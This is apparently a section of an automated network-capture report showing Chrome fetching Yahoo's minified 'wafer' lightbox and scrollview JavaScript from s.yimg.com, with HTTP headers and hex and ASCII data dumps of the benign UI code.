                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 72 20 79 3d 62 3d 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 2d 6c 61 62 65 6c 2d 22 2b 44 61 74 65 2e 6e 6f 77 28 29 3b 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 79 29 7d 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 2c 62 29 7d 73 26 26 28 70 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 6c 69 67 74 68 62 6f 78 2d 73 6f 75 72 63 65 2d 22 2b 73 29 2c 4d 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 6c 69 67 74 68 62 6f 78 2d 73 6f 75 72 63 65 2d 22 2b 73 2b 22 2d 6f 70 65 6e 22 29 29 2c 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6d 6f 64 61 6c 22 2c 21 30 29 2c 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r y=b="wafer-lightbox-label-"+Date.now();d.setAttribute("id",y)}p.setAttribute("aria-labelledby",b)}s&&(p.classList.add("wafer-ligthbox-source-"+s),M.classList.add("wafer-ligthbox-source-"+s+"-open")),p.setAttribute("aria-modal",!0),p.setAttribute("role",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 74 68 69 73 2e 5f 75 74 69 6c 2e 74 72 69 67 67 65 72 26 26 74 68 69 73 2e 6f 70 65 6e 28 29 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 54 6f 75 63 68 53 74 61 72 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 5f 73 74 61 74 65 2e 74 6f 75 63 68 73 74 61 72 74 59 3d 65 2e 63 68 61 6e 67 65 64 54 6f 75 63 68 65 73 5b 30 5d 2e 73 63 72 65 65 6e 59 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 54 6f 75 63 68 4d 6f 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6f 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 77 72 61 70 70 65 72 4d 61 70 2c 6c 3d 6f 2e 65 6c 65 6d 65 6e 74 54 6f 53 63 72 6f 6c 6c 3b 69 66 28 30 3d 3d 3d 6c 2e 73 63 72 6f 6c 6c 54 6f 70 29 7b 76 61 72 20 72 3d 65 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: this._util.trigger&&this.open())}},{key:"handleTouchStart",value:function(e){this._state.touchstartY=e.changedTouches[0].screenY}},{key:"handleTouchMove",value:function(e){var t=this,o=this._util.wrapperMap,l=o.elementToScroll;if(0===l.scrollTop){var r=e.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 74 3d 65 2e 62 6f 75 6e 64 61 72 79 2c 6f 3d 65 2e 65 6c 65 6d 2c 6e 3d 65 2e 74 61 72 67 65 74 2c 6c 3d 65 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 75 74 69 6c 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 3d 6c 7c 7c 6e 26 26 5f 28 28 74 26 26 76 28 6f 2c 74 29 7c 7c 4d 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 29 29 2c 74 68 69 73 2e 5f 75 74 69 6c 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 7d 7d 5d 29 2c 74 7d 28 79 29 3b 41 2e 65 76 65 6e 74 73 3d 7b 63 6c 69 63 6b 3a 5b 5b 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 2c 22 68 61 6e 64 6c 65 43 6c 69 63 6b 22 5d 5d 7d 3b 76 61 72 20 50 3d 41 2c 59 3d 4f 62 6a 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,get:function(){var e=this._util,t=e.boundary,o=e.elem,n=e.target,l=e.templateText;return this._util.templateText=l||n&&_((t&&v(o,t)||M).querySelector(n)),this._util.templateText}}]),t}(y);A.events={click:[["wafer-lightbox","handleClick"]]};var P=A,Y=Obje
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 62 69 6e 64 45 76 65 6e 74 2c 58 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 62 61 73 65 2c 7a 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72 42 61 73 65 43 6f 6e 74 72 6f 6c 6c 65 72 2c 47 3d 64 6f 63 75 6d 65 6e 74 2c 51 3d 47 2e 62 6f 64 79 2c 5a 3d 47 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 24 3d 22 73 63 72 6f 6c 6c 22 3d 3d 3d 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 76 65 72 66 6c 6f 77 59 3f 51 3a 5a 2c 65 65 3d 76 6f 69 64 20 30 2c 74 65 3d 76 6f 69 64 20 30 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: bindEvent,X=window.wafer.base,z=window.wafer.controllers.WaferBaseController,G=document,Q=G.body,Z=G.documentElement,$="scroll"===window.getComputedStyle(document.body).overflowY?Q:Z,ee=void 0,te=void 0,oe=function(e){function t(){var e=arguments.length>0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 2c 7b 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 7d 29 29 2c 79 2e 5f 73 74 61 74 65 2e 6c 61 73 74 53 63 72 6f 6c 6c 59 3d 65 2c 79 2e 5f 73 74 61 74 65 2e 63 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 3d 74 68 69 73 2c 79 2e 5f 73 74 61 74 65 2e 6f 70 65 6e 3d 21 30 7d 2c 50 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 6e 64 6c 65 53 77 69 70 65 43 6c 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 79 2e 5f 63 6c 6f 73 65 28 7b 73 6f 75 72 63 65 3a 22 73 77 69 70 65 43 6c 6f 73 65 22 7d 29 7d 2c 62 2e 5f 72 65 6e 64 65 72 4c 69 67 68 74 42 6f 78 57 72 61 70 70 65 72 28 29 2c 62 2e 73 79 6e 63 28 29 2c 62 7d 72 65 74 75 72 6e 20 63 28 74 2c 65 29 2c 42 28 74 2c 5b 7b 6b 65 79 3a 22 5f 63 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,{overflow:"hidden"})),y._state.lastScrollY=e,y._state.currentInstance=this,y._state.open=!0},P.prototype.handleSwipeClose=function(){y._close({source:"swipeClose"})},b._renderLightBoxWrapper(),b.sync(),b}return c(t,e),B(t,[{key:"_close",value:function(){
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 65 6e 74 28 22 6c 69 67 68 74 62 6f 78 3a 63 6c 6f 73 65 22 2c 7b 65 6c 65 6d 3a 69 2c 6d 65 74 61 3a 7b 73 6f 75 72 63 65 3a 6e 2c 74 61 72 67 65 74 45 6c 65 6d 3a 66 7d 7d 29 7d 2c 70 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 43 6c 6f 73 65 43 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 5f 63 6c 6f 73 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 42 67 43 6c 6f 73 65 43 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2e 70 72 6f 70 73 2e 77 72 61 70 70 65 72 4d 61 70 2c 6f 3d 74 2e 77 72 61 70 70 65 72 45 6c 65 6d 3b 65 2e 74 61 72 67 65 74 3d 3d 3d 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ent("lightbox:close",{elem:i,meta:{source:n,targetElem:f}})},p)}}},{key:"_handleCloseClick",value:function(e){e.preventDefault(),this._close()}},{key:"_handleBgCloseClick",value:function(e){var t=this._options.props.wrapperMap,o=t.wrapperElem;e.target===o


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              107192.168.2.45113087.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC544OUTGET /aaq/wf/wf-scrollview-2.23.3-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC756INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 8YYgmPyqxsiPGd1lv0fH0rENQKj+xLy4ove3i65TnbKdrPDR8RhIpuK1c5+bYnnMLDsBcZa4ajUAZiij7YWHtA==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: RWXR296HF3YE6H4N
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Fri, 27 Sep 2024 17:25:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 13 Jun 2024 07:21:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "4636cb14c3d8d1eba5bb4da2cfcf18aa"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: wbLD4opJICdradPjNHbYrnSOdnE8aBLq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 35505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 956875
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 73 63 72 6f 6c 6c 76 69 65 77 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 73 63 72 6f 6c 6c 76 69 65 77 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-scrollview",[],t):"object"==typeof exports?exports["wafer-scrollview"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 21 74 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 3f 65 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}function l(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 69 3d 74 2e 77 69 6e 64 6f 77 4c 69 6d 69 74 2c 72 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 35 3a 69 3b 73 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 61 63 74 69 76 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 3d 6e 65 77 20 4d 61 70 2c 74 68 69 73 2e 74 61 69 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 79 63 6c 65 3d 21 31 2c 74 68 69 73 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 63 72 6f 6c 6c 49 74 65 6d 73 4c 69 6d 69 74 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 32 29 7d 72 65 74 75 72 6e 20 64 28 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {function e(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},i=t.windowLimit,r=void 0===i?5:i;s(this,e),this.active=null,this.elemMapping=new Map,this.tail=null,this.cycle=!1,this.head=null,this.scrollItemsLimit=Math.floor(r/2)}return d(e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 6f 6c 6c 49 74 65 6d 73 4c 69 6d 69 74 3b 69 66 28 74 68 69 73 2e 63 79 63 6c 65 29 7b 69 3c 3d 32 3f 73 3d 30 3a 69 3c 3d 33 26 26 28 73 3d 31 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 46 6f 72 77 61 72 64 28 73 2b 31 29 7d 72 65 74 75 72 6e 20 74 3c 73 3f 6e 75 6c 6c 3a 69 3e 74 2b 73 2d 31 3f 74 68 69 73 2e 67 65 74 46 6f 72 77 61 72 64 28 73 2b 31 29 3a 6e 75 6c 6c 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 45 6c 65 6d 65 6e 74 54 6f 50 72 65 70 65 6e 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 2e 67 65 74 28 74 68 69 73 2e 61 63 74 69 76 65 29 2c 74 3d 65 2e 67 65 74 28 22 69 6e 64 65 78 22 29 2c 69 3d 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 2e 73 69 7a 65 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ollItemsLimit;if(this.cycle){i<=2?s=0:i<=3&&(s=1);return this.getForward(s+1)}return t<s?null:i>t+s-1?this.getForward(s+1):null}},{key:"getElementToPrepend",value:function(){var e=this.elemMapping.get(this.active),t=e.get("index"),i=this.elemMapping.size,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 2e 73 69 7a 65 7d 7d 5d 29 2c 65 7d 28 29 2c 70 3d 66 2c 6d 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 69 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 69 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 69 2c 73 29 26 26 28 65 5b 73 5d 3d 69 5b 73 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tion(){return this.elemMapping.size}}]),e}(),p=f,m=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var s in i)Object.prototype.hasOwnProperty.call(i,s)&&(e[s]=i[s])}return e},g=function(){function e(e,t){for(var i=0;i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 5b 22 69 6e 64 65 78 22 5d 2c 4b 3d 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 77 69 6e 64 6f 77 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4b 26 26 28 65 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 74 29 7d 2c 5a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 2c 74 3d 21 31 3b 72 65 74 75 72 6e 7b 61 64 64 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 65 29 7d 7d 28 69 29 29 2c 74 68 69 73 2e 65 78 65 63 28 69 2e 5f 75 74 69 6c 2e 74 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 29 7d 2c 65 78 65 63 3a 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 73 3d 74 68 69 73 3b 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ["index"],K="ontouchstart"in window,Q=function(e,t){K&&(e.style.cursor=t)},Z=function(){var e=[],t=!1;return{add:function(t,i){e.push(function(e){return function(){return t.call(e)}}(i)),this.exec(i._util.transitionDuration)},exec:function(i){var s=this;t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 73 3a 41 2c 69 6e 64 69 63 61 74 6f 72 50 61 67 69 6e 61 74 69 6f 6e 3a 67 2c 69 6e 64 69 63 61 74 6f 72 73 43 75 73 74 6f 6d 43 6f 75 6e 74 3a 76 2c 69 6e 64 69 63 61 74 6f 72 54 79 70 65 3a 5f 2c 69 6e 64 69 63 61 74 6f 72 57 69 74 68 43 6f 75 6e 74 45 6c 65 6d 3a 6b 2c 69 6e 64 69 63 61 74 6f 72 57 69 74 68 6f 75 74 43 6f 75 6e 74 45 6c 65 6d 3a 53 2c 73 6e 61 70 42 65 68 61 76 69 6f 72 3a 64 2c 73 6c 69 64 65 72 45 6c 65 6d 3a 4d 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 73 6c 69 64 65 73 22 29 29 5b 30 5d 7c 7c 65 2c 62 65 68 61 76 69 6f 72 3a 63 2c 6e 65 78 74 42 74 6e 3a 4d 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 6e 65 78 74 2d 62 74 6e 22 29 29 5b 30 5d 2c 70 72 65 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s:A,indicatorPagination:g,indicatorsCustomCount:v,indicatorType:_,indicatorWithCountElem:k,indicatorWithoutCountElem:S,snapBehavior:d,sliderElem:M(e.getElementsByClassName("slides"))[0]||e,behavior:c,nextBtn:M(e.getElementsByClassName("next-btn"))[0],prev
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 6a 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 62 6f 75 6e 64 61 72 79 22 29 2c 55 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 74 72 69 67 67 65 72 2d 77 66 2d 64 75 72 69 6e 67 2d 74 72 61 6e 73 69 74 69 6f 6e 22 29 2c 4b 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 73 63 72 6f 6c 6c 76 69 65 77 2d 74 64 22 29 2c 5a 3d 4e 75 6d 62 65 72 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 61 75 74 6f 2d 73 77 69 74 63 68 22 29 29 7c 7c 30 2c 24 3d 4e 75 6d 62 65 72 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 61 75 74 6f 2d 73 77 69 74 63 68 2d 64 69 73 61 62 6c 65 2d 68 6f 76 65 72 22 29 29 7c 7c 30 2c 65 65 3d 4e 75 6d 62 65 72 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 64 69 73 61 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: j=e.getAttribute(L+"boundary"),U=e.getAttribute(L+"trigger-wf-during-transition"),K=e.getAttribute(L+"scrollview-td"),Z=Number(e.getAttribute(L+"auto-switch"))||0,$=Number(e.getAttribute(L+"auto-switch-disable-hover"))||0,ee=Number(e.getAttribute(L+"disab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 72 3a 6e 75 6c 6c 7d 2c 6e 65 2e 73 6c 69 64 65 72 49 74 65 6d 73 3d 4d 28 6e 65 2e 73 6c 69 64 65 72 45 6c 65 6d 2e 63 68 69 6c 64 72 65 6e 29 3b 76 61 72 20 6c 65 3d 6e 65 2e 73 6c 69 64 65 72 49 74 65 6d 73 2e 6c 65 6e 67 74 68 3b 69 66 28 75 2e 5f 73 74 61 74 65 2e 73 6c 69 64 65 57 69 64 74 68 3d 31 30 30 2f 6c 65 2c 75 2e 75 70 64 61 74 65 57 69 64 74 68 28 29 2c 58 28 6e 65 2e 73 6c 69 64 65 72 45 6c 65 6d 2c 22 74 72 61 6e 73 66 6f 72 6d 22 2c 6e 65 2e 74 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 2c 6e 65 2e 74 72 61 6e 73 69 74 69 6f 6e 54 69 6d 69 6e 67 46 75 6e 63 74 69 6f 6e 29 2c 51 28 6e 65 2e 73 6c 69 64 65 72 45 6c 65 6d 2c 22 2d 77 65 62 6b 69 74 2d 67 72 61 62 22 29 2c 6e 65 2e 65 64 67 65 50 61 64 64 69 6e 67 50 65 72 63 65 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r:null},ne.sliderItems=M(ne.sliderElem.children);var le=ne.sliderItems.length;if(u._state.slideWidth=100/le,u.updateWidth(),X(ne.sliderElem,"transform",ne.transitionDuration,ne.transitionTimingFunction),Q(ne.sliderElem,"-webkit-grab"),ne.edgePaddingPercen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 64 65 72 49 74 65 6d 73 5b 72 5d 3b 73 3d 65 21 3d 3d 61 2c 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 73 2b 22 22 29 3b 76 61 72 20 6e 3d 4e 28 61 29 3b 73 3f 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 7d 29 3a 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 7d 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 73 63 72 6f 6c 6c 56 69 65 77 57 69 74 68 4e 61 74 69 76 65 53 79 6e 63 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 5f 73 74 61 74 65 2e 6c 6f 63 6b 65 64 29 7b 76
